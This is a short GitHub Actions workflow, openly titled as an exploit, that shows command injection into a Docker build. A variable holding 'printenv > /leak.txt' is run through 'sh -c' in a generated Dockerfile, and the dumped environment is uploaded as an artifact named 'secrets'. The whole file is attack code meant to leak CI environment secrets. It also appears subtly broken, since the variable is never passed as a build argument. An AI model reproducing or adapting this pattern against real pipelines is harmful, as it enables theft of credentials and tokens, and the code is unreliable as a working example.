name: Exploit Dockerfile Injection

on:
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest

    env:
      PYTHON_VERSION: 'printenv > /leak.txt'

    steps:
    - name: Checkout
      uses: actions/checkout@v4

    - name: Create Dockerfile
      run: |
        echo 'FROM alpine' > Dockerfile
        echo 'ARG PYTHON_VERSION' >> Dockerfile
        echo 'RUN echo "Running malicious PYTHON_VERSION: ${PYTHON_VERSION}" && sh -c "${PYTHON_VERSION}"' >> Dockerfile

    - name: Build image with injected command
      run: |
        docker build -t hacked-image .

    - name: Extract /leak.txt
      run: |
        docker run --rm hacked-image cat /leak.txt > leak.txt

    - name: Upload secrets
      uses: actions/upload-artifact@v4
      with:
        name: secrets
        path: leak.txt
